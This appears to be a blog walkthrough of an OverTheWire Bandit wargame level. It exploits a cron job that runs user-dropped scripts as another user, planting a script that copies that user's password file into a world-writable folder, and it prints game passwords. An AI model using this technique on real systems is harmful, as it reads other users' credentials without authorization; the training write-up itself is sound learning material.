MayADevBe Blog

A Blog about Computer Science

OverTheWire Bandit Level 23 -> 24 - Walkthrough

Published - 2022-05-24 | 3min

Previous Level: Level 23

Login

SSH: ssh bandit23@bandit.labs.overthewire.org -p 2220

Password: jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n

Task

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

A little bit of Theory

In this level the theory from level 22 and level 23 is needed. It again deals with cronjobs and bash scripting.

Solution

This level starts the same way as the previous ones. I looked at the cronjobs and what file gets executed.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

bandit23@bandit:~$ ls -la /etc/cron.d
total 36
drwxr-xr-x  2 root root 4096 Jul 11  2020 .
drwxr-xr-x 87 root root 4096 May 14  2020 ..
-rw-r--r--  1 root root   62 May 14  2020 cronjob_bandit15_root
-rw-r--r--  1 root root   62 Jul 11  2020 cronjob_bandit17_root
-rw-r--r--  1 root root  120 May  7  2020 cronjob_bandit22
-rw-r--r--  1 root root  122 May  7  2020 cronjob_bandit23
-rw-r--r--  1 root root  120 May 14  2020 cronjob_bandit24
-rw-r--r--  1 root root   62 May 14  2020 cronjob_bandit25_root
-rw-r--r--  1 root root  102 Oct  7  2017 .placeholder
bandit23@bandit:~$ cat /etc/cron.d/cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        owner="$(stat --format "%U" ./$i)"
        if [ "${owner}" = "bandit23" ]; then
            timeout -s 9 60 ./$i
        fi
        rm -f ./$i
    fi
done

The script executes and deletes all files in the folder ‘/var/spool/bandit24’. This is the case because it is run as bandit24 user, so the variable ‘myname’ contains the value ‘bandit24’. The for loop goes through the files. The first if statement makes sure the directories ‘.’ and ‘..’, which are representing the current and previous folders, are ignored. Inside the if statement is the code to execute a script, but only if the owner is bandit23. Then the file will be deleted.

Since we are currently logged in as bandit23 user, we can create a script that will give us the password for bandit24. First, create a file in the ’tmp’ folder. This prevents an early deletion of the file and you have a copy in case something went wrong. Then move the file to the folder ‘/var/spool/bandit24’ and it will be executed.

You can either echo the lines in the file or use a text editor like nano or vim. In nano, you can use CTRL+S to save and CTRL+X to quit.

1
2
3
4

bandit23@bandit:~$ mktemp -d
/tmp/tmp.ljEyl6kv1M
bandit23@bandit:~$ cd /tmp/tmp.ljEyl6kv1M
bandit23@bandit:/tmp/tmp.ljEyl6kv1M$ nano bandit24_pass.sh

I oriented myself on the previously seen scripts, but there are a lot of methods to write this. The first line is, as always, the shebang, indicating that it is a bash script. The second line writes the password from bandit24 into a file in the created folder.

1
2

#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/tmp.ljEyl6kv1M/password

Now you only need to give the necessary permissions to the folder and the file. Finally, move the file into the correct folder. I also created the output file and gave it full permissions.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

bandit23@bandit:/tmp/tmp.ljEyl6kv1M$ chmod +rx bandit24_pass.sh 
bandit23@bandit:/tmp/tmp.ljEyl6kv1M$ chmod 777 /tmp/tmp.ljEyl6kv1M
bandit23@bandit:/tmp/tmp.ljEyl6kv1M$ touch password
bandit23@bandit:/tmp/tmp.ljEyl6kv1M$ chmod +rwx password 
bandit23@bandit:/tmp/tmp.ljEyl6kv1M$ ls -la
total 1120
drwxrwxrwx    2 bandit23 root        4096 Jun 17 16:32 .
drwxrws-wt 4795 root     root     1134592 Jun 17 16:33 ..
-rwxr-xr-x    1 bandit23 root          73 Jun 17 16:16 bandit24_pass.sh
-rwxrwxrwx    1 bandit23 bandit23       0 Jun 17 16:32 password
bandit23@bandit:/tmp/tmp.ljEyl6kv1M$ cp bandit24_pass.sh /var/spool/bandit24/bandit24_pass.sh

Once this is done, you only need to wait for a minute and read the password file. If the file is empty, check the permissions and the script for any writing errors.

1
2

bandit23@bandit:/tmp/tmp.ljEyl6kv1M$ cat password 
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

Edit (10.02.2023): This level has been slightly changed, the folder - in which the script needs to be copied - changed - this can lead to a Permission Error when trying to use the ‘cp’ command. Make sure to check the cronjob script for the correct folder.

https://overthewire.org/wargames/bandit/bandit24.html

Next Level: Level 25


Share on:
Comments:
Related Content:
OverTheWire Bandit Level 32 -> 33 - Walkthrough

A walkthrough of Level 32 -> 33 of the Bandit wargame from OverTheWire. - Linux Variables and shell escape.

OverTheWire Bandit Level 31 -> 32 - Walkthrough

A walkthrough of Level 31 -> 32 of the Bandit wargame from OverTheWire. - Git Push, Commit, Ignore, Add.